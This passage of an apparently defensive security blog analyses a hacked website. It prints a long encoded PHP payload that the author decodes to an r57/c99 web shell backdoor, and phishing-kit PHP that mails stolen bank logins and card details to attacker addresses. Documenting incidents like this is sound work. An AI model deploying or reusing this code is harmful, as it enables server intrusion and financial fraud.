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')));   5: ?>

Again another base64 encoding this time gzip compressed also. There are many ways to uncompress and decode the data the easiest and fasted method it will be just to run the php code in a safe environment and pipe the contents to a file.

user@vm1$ php phpdecode.php > test

user@vm1$ file test

test: ASCII text, with very long lines, with CRLF, LF line terminators

So as expected the file is text and specifically html code. The results are the following:

The output is the familiar page of r57shell/c99shell.

In a summary what the exploit will do, it will try to create a backdoor page on the server with the name kanoodle_settings.php on a hidden directory under the name .fantasticodata, as for the attackers a Google search results in a couple of days it will give them the required access to the system.

hacked pages and spam

2011-04-17T16:12:00.001+03:00

Another day goes by another guy reports a hacked website. This time with new spam scripts. The vulnerable web site was running an old version of osCommerce and the attackers were quite a few in the last days. What was added to the site mainly was phising templates for AoL, BofA, and others. Interestingly there is a website referred to most of the scripts, the site is http://maroc-spam.net with really bad work on the web template there guys if you are making phising sites and you promote yours in there make a better work at least.

Looking at the AoL ( http://www.deventum.com/research/Aol.zip ) files we can find information about the card that they support on their phising, eg,

cards [0] = {name: "Visa",
             length: "13,16",
             prefixes: "4",
             checkdigit: true};
cards [1] = {name: "MasterCard",
             length: "16",
             prefixes: "51,52,53,54,55",
             checkdigit: true};
cards [2] = {name: "DinersClub",
             length: "14,16",
             prefixes: "300,301,302,303,304,305,36,38,55",
             checkdigit: true};
cards [3] = {name: "CarteBlanche",
             length: "14",
             prefixes: "300,301,302,303,304,305,36,38",
             checkdigit: true};
cards [4] = {name: "AmEx",
             length: "15",
             prefixes: "34,37",
             checkdigit: true};
cards [5] = {name: "Discover",
             length: "16",
             prefixes: "6011,650",
             checkdigit: true};
cards [6] = {name: "JCB",
             length: "15,16",
             prefixes: "3,1800,2131",
             checkdigit: true};
cards [7] = {name: "enRoute",
             length: "15",
             prefixes: "2014,2149",
             checkdigit: true};
cards [8] = {name: "Solo",
             length: "16,18,19",
             prefixes: "6334, 6767",
             checkdigit: true};
cards [9] = {name: "Switch",
             length: "16,18,19",
             prefixes: "4903,4905,4911,4936,564182,633110,6333,6759",
             checkdigit: true};
cards [10] = {name: "Maestro",
             length: "16,18",
             prefixes: "5020,6",
             checkdigit: true};
cards [11] = {name: "VisaElectron",
             length: "16",
             prefixes: "417500,4917,4913",
             checkdigit: true};

Only one file is encoded using base64 encoding and the decoded output contains, the mail where the information are sent, this is defined as : $mail ="golobaz@voila.fr";

Another directory with the name www.poste.it has phising information about poste.it website. Again there is only one encoded file containing information about the recipient of the details gathered,

$usip = $_SERVER['REMOTE_ADDR'];
$mail = "golobaz@voila.fr";
$subj = "Posteitaliane Utente ";

An interesting script that seems to be specifically created for osCommerce applications since it’s gathering data from configuration files and database is Thumbs.db.php, ( http://www.deventum.com/research/Thumbs.db.php.gz )

More scripts, slq.php file, ( http://www.deventum.com/research/slq.php.gz ) is an interface for mysql or as it’s described “MySQL Interface (Developed By Mohajer22)” with embedded username and password set to :

$PASSWORD = "root_xhahax";
$USERNAME = "xhahax";

Another php web shell “ Web Shell by oRb” under the name of account_manage.php that it is a modified version of c99 shell scripts with a slightly better interface.

The usual scripts for mass mailing, this time “ Made By Mo$`Craci|a` “ , one more backdoor on the site with the name cookie_usage.php that enables an attacker to post a crafted request and login as administrator on the system.

The Bofa, “Bank of America” phising template is sending the information gathered to the following address,

$send="latesayee800@blumail.org";
$subject = "Fresh BOFA Rezult | $user | $ip";
$headers = "From: alsa7r >";

Also inside style.css we have

<?
$IP = 'm4rk0l30p4rd@yahoo.com,m4rk0l30p4rd@hotmail.com';
?>

And finally a phising template for www.caisse-epargne.fr which under confirm_fichiers/ScriptResource_013.axd again on base64 encoding contains the following:

$message = "-----------------------------------------\n";
$message .= "--------------+ Login Info +-------------\n";
$message .= "-----------------------------------------\n";
$message .= "Nom complet : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbPrenom']." ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbNom']."\n";
$message .= "Identifiant Client : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbInternaute']."\n";
$message .= "Date de naiscance : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbDateNaissance']."\n"; include 'confirm_fichiers/ScriptResource_012.axd';
$message .= "Email : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbEmail']."\n";
$message .= "-----------------------------------------\n";
$message .= "Adresse : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCoordonneesPostales$CC_sous_coordonnees_postales_bloc$wzdCoordonneesPostales$tbAdresse']."\n";
$message .= "ville : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCoordonneesPostales$CC_sous_coordonnees_postales_bloc$wzdCoordonneesPostales$tbVille']."\n";
$message .= "code postal : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCoordonneesPostales$CC_sous_coordonnees_postales_bloc$wzdCoordonneesPostales$tbCP']."\n";
$message .= "-----------------------------------------\n";
$message .= "CC number : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCallBack$CC_sous_call_back_bloc$wzdCallBack$tbTelephoneBureau']."\n";
$message .= "exp date : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCallBack$CC_sous_call_back_bloc$wzdCallBack$tbTelephoneMobile']."\n";
$message .= "cvv : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCallBack$CC_sous_call_back_bloc$wzdCallBack$tbTelephone']."\n";
$message .= "-----------------------------------------\n";
$message .= "--------------+ Made By REDHATTeam +------------\n";
$message .= "--------------+ Thnx My Redhatteam +------------\n";
$message .= "-----------------------------------------\n";

$send="golobaz@voila.fr";

$subject = "Bravo | $login";

$headers = "From: REdhatteam - maroc-spam.net";

mail($send,$subject,$message,$headers);

header("Location: https://www.caisse-epargne.fr/pauth.aspx?");

sqlmap and tor

